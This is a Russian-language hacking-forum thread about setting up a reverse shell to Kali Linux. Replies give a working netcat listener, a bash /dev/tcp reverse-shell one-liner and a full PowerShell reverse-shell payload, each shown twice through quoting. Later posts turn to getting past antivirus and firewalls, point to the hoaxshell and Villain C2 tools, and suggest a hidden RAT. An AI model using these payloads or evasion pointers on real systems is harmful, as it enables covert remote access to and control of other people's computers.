по поводу ReverseShell

r24627306 · 17.02.2023

Здравствуйте,

Помогите пожалуйста,

Поделитесь ссылкой где описанна процедура с Reverse Shell что бы другой компьютер (свой же) подключился через Reverse Shell к Kali Linux.
А затем у меня вопрос: При соединение через Реверсинг браудмер будет ли блокировать подключение ? Как я понял то - нет. Если да, то как обойти ?

Если у вас есть полная подробная статья, буду вам благодарен.
Заранее спасибо.

GoBL1n · 17.02.2023

на кали: nc -lvnp 9001
на "другом компе": sh -i >& /dev/tcp/IP_ADR_KALI/9001 0>&1 = если Linux
но у тебя я так понял вин на "другом компе", тогда в PowerShell :

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

заменить «<IP>» и «<port>»

глянь сайт

Ссылка скрыта от гостей

по поводу брандмауэра - скорее заблокирует

и ваще, почитай про Reverse Shell для начала, что это и какие бывают. А лучше сразу писать задачу, возможно твоя задача решается намного проще...

larchik · 17.02.2023

r24627306 сказал(а):
браудмер будет ли блокировать подключение ?

смотря как он настроен. На удаленной машине могут быть заблокированы исходящие соединения на некоторые порты (чаще на все, кроме некоторых). На локальной машине могут быть заблокированы входящие.

r24627306 · 17.02.2023

GoBL1n сказал(а):
на кали: nc -lvnp 9001
на "другом компе": sh -i >& /dev/tcp/IP_ADR_KALI/9001 0>&1 = если Linux
но у тебя я так понял вин на "другом компе", тогда в PowerShell :

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

заменить «<IP>» и «<port>»

глянь сайт

Ссылка скрыта от гостей

по поводу брандмауэра - скорее заблокирует

и ваще, почитай про Reverse Shell для начала, что это и какие бывают. А лучше сразу писать задачу, возможно твоя задача решается намного проще...

для начала, спасибо за ответ.
но я думал все будет не много проще... например без того что бы вводить команды в PowerShell например я просто открою какой то файл без того что бы его спалил какой то антивирус и стена не блокировала подключение . или это уже не reverse идет ??

r24627306 · 17.02.2023

larchik сказал(а):
смотря как он настроен. На удаленной машине могут быть заблокированы исходящие соединения на некоторые порты (чаще на все, кроме некоторых). На локальной машине могут быть заблокированы входящие.

спасибо за ответ.

GoBL1n · 17.02.2023

r24627306 сказал(а):
для начала, спасибо за ответ.
но я думал все будет не много проще... например без того что бы вводить команды в PowerShell например я просто открою какой то файл без того что бы его спалил какой то антивирус и стена не блокировала подключение . или это уже не reverse идет ??

вот теперь понятна задача))
привет из прошлого)))

"без того что бы вводить команды в PowerShell например я просто открою какой то файл без того что бы его спалил какой то антивирус" - бро, кроме антивируса ( с кучей модулей и векторов проверок) есть ещё куча других защит, UAC, брандмауэр, встроенный антивирь, фаерфол установленный и т.п. Не всё так просто, ни кто тебе не расскажет, как взломать современный комп незаметно )))

larchik · 17.02.2023

r24627306 сказал(а):
для начала, спасибо за ответ.
но я думал все будет не много проще... например без того что бы вводить команды в PowerShell например я просто открою какой то файл без того что бы его спалил какой то антивирус и стена не блокировала подключение . или это уже не reverse идет ??

Просто открыть файл - ну можно шелл сохранить скрипт в файл bash или ps1, и выполнить его ) а чтоб его не палил антивирус, можно поизучать соответствующий софт, например:

GitHub - t3l3machus/hoaxshell: A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.

A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell. - t3l3machus/hoaxshell

github.com

GitHub - t3l3machus/Villain: Villain is a high level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibli

Villain is a high level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and shar...

github.com

r24627306 · 17.02.2023

GoBL1n сказал(а):
вот теперь понятна задача))
привет из прошлого)))

"без того что бы вводить команды в PowerShell например я просто открою какой то файл без того что бы его спалил какой то антивирус" - бро, кроме антивируса ( с кучей модулей и векторов проверок) есть ещё куча других защит, UAC, брандмауэр, встроенный антивирь, фаерфол установленный и т.п. Не всё так просто, ни кто тебе не расскажет, как взломать современный комп незаметно )))

хехе) ну буду учится.. но идею ты полностью понял.

r24627306 · 17.02.2023

larchik сказал(а):
Просто открыть файл - ну можно шелл сохранить скрипт в файл bash или ps1, и выполнить его ) а чтоб его не палил антивирус, можно поизучать соответствующий софт, например:

GitHub - t3l3machus/hoaxshell: A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.

A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell. - t3l3machus/hoaxshell

github.com

GitHub - t3l3machus/Villain: Villain is a high level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibli

Villain is a high level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and shar...

github.com

спасибо бро

GoBL1n · 17.02.2023

r24627306 сказал(а):
хехе) ну буду учится.. но идею ты полностью понял.

начни с попроще - RAT (скрытый)

Все сервисы Codeby

Поиск

Поиск

по поводу ReverseShell

r24627306

Member

GoBL1n

larchik

r24627306

Member

r24627306

Member

GoBL1n

larchik

GitHub - t3l3machus/hoaxshell: A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.

GitHub - t3l3machus/Villain: Villain is a high level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibli

r24627306

Member

r24627306

Member

GitHub - t3l3machus/hoaxshell: A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.

GitHub - t3l3machus/Villain: Villain is a high level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibli

GoBL1n